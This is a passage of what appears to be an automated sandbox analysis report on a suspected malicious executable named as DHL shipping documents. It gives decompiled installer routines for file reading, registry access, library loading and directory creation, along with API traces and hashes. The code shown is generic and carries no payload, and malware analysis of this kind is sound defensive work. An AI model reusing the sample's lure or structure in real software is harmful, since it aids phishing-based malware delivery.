0x100029d2
0x100029da
0x10002a06
0x10002a07
0x10002a0d
0x10002a0d
0x10002a14
0x100029ea
0x100029ea
0x100029eb
0x100029f9
0x10002a02
0x10002a02
0x100029da
0x100029be
0x10002a1d
0x10002a1f
0x10002a1f
0x10002a31
0x10002a3e
0x10002a4c
0x10002a52
0x10002a60
0x10002a68
0x10002a68
0x10002a76
0x10002a76
0x100028fd
0x100028fe
0x10002903
0x10002907
0x1000290c
0x10002920
0x10002921
0x10002922
0x10002924
0x10002929
0x1000292b
0x1000292b
0x1000292e
0x10002934
0x00000000

APIs

SetFilePointer.KERNELBASE(00000000), ref: 1000295B
GetLastError.KERNEL32 ref: 10002A62

Memory Dump Source

Source File: 00000002.00000002.1825292109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.1825259905.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825336540.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825369944.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_documentos DHL.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004031BA Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004031BA(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x418ed4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004032C2(4);
				if(_t22 >= 0) {
					_t24 = E00405F25( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x418ed4 =  *0x418ed4 + 4;
						_t36 = E004032C2(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x418ed4 =  *0x418ed4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E00405F25( *0x40a01c, 0x414ed0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E00405F54(_a8, 0x414ed0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x418ed4 =  *0x418ed4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x004031be
0x004031c7
0x004031d0
0x004031d4
0x004031df
0x004031df
0x004031e7
0x004031ee
0x00403200
0x00403207
0x004032ac
0x004032ac
0x00000000
0x0040320d
0x00403210
0x0040321c
0x00403220
0x004032ba
0x004032ba
0x00403226
0x00403229
0x00403288
0x0040328e
0x00403290
0x00403290
0x004032a2
0x004032aa
0x004032b1
0x004032b4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040322b
0x0040322e
0x00000000
0x00403234
0x00403239
0x00403240
0x00403243
0x00403245
0x00403245
0x00403252
0x00403255
0x0040325c
0x00000000
0x00000000
0x00403265
0x0040326c
0x00403284
0x004032ae
0x004032ae
0x0040326e
0x0040326e
0x00403271
0x00403274
0x0040327a
0x00403280
0x00000000
0x00403282
0x00000000
0x00403282
0x00403280
0x00000000
0x0040326c
0x00000000
0x00403239
0x0040322e
0x00403229
0x00403220
0x00403207
0x004032bc
0x004032bf

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040247E(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C77(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C37(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E004062F7(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
				return 0;
			}

0x0040247e
0x0040247e
0x00402483
0x0040248a
0x0040248c
0x00402493
0x00402496
0x00402885
0x0040249c
0x0040249f
0x004024ba
0x004024ea
0x004024ea
0x004024ed
0x004024bc
0x004024c0
0x004024d9
0x004024e0
0x004024e3
0x004024c2
0x004024c5
0x004024d0
0x00402549
0x00000000
0x00000000
0x00000000
0x004024c5
0x004024c0
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: d1ed4712f9ddc5df9e0c4292a07e840535ca434856bc46c28965fc47fb17bc3e
Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
Opcode Fuzzy Hash: d1ed4712f9ddc5df9e0c4292a07e840535ca434856bc46c28965fc47fb17bc3e
Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42922c =  *0x42922c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42922c, 0x7530,  *0x429214), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402388(void* __ebx) {
				long _t7;
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x24));
				if( *(_t23 - 0x18) != __ebx) {
					_t7 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t10 = E00402C77(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402388
0x00402388
0x0040238b
0x0040238e
0x004023ca
0x004023cf
0x00000000
0x00402390
0x00402392
0x00402397
0x0040239b
0x00402885
0x00402885
0x004023a1
0x004023b1
0x004023b3
0x004023d1
0x004023d3
0x00000000
0x004023d9
0x004023d3
0x0040239b
0x00402ac2
0x00402ace

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
RegCloseKey.ADVAPI32(00000000), ref: 004023B3

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: fb8409d2844e7e43588d342dde60b7d478f1faa2946025fa9120647d2f8a18ff
Instruction ID: eeebe11236d86b478005370e27fb04b66889edd8f93d7ff1d49de92df4b57ee5
Opcode Fuzzy Hash: fb8409d2844e7e43588d342dde60b7d478f1faa2946025fa9120647d2f8a18ff
Instruction Fuzzy Hash: 58F09632A04114DBE711BBA49B4EABEB2A59B44354F16053FFA02F71C1DEFC4D41866D

Uniqueness

Uniqueness Score: -1.00%

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
Opcode Fuzzy Hash: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040678A Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040678A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E0040671A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406792
0x00406795
0x0040679c
0x004067a4
0x004067b0
0x00000000
0x004067b7
0x004067a7
0x004067ae
0x00000000
0x004067bf
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
GetProcAddress.KERNEL32(00000000,?), ref: 004067B7

Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
Part of subcall function 0040671A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406780

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D

Uniqueness

Uniqueness Score: -1.00%

Function 00405EA2 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405EA2(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405ea6
0x00405eb3
0x00405ec8
0x00405ece

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\documentos DHL.exe,80000000,00000003), ref: 00405EA6
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405E7D Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E7D(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x00405e82
0x00405e88
0x00405e8d
0x00405e96
0x00405e96
0x00405e9f

APIs

GetFileAttributesW.KERNELBASE(?,?,00405A82,?,?,00000000,00405C58,?,?,?,?), ref: 00405E82
SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405E96

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: b4a9c655c7fc096b4b126609cc6ca019b0e5db690544b5b17486f729e9fe50d2
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: F4D0C972504420ABC2502728EF0889BBB95DB542727124B35FAE9A22B0CB304C568A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405960 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405960(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405966
0x0040596e
0x00000000
0x00405974
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76523420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
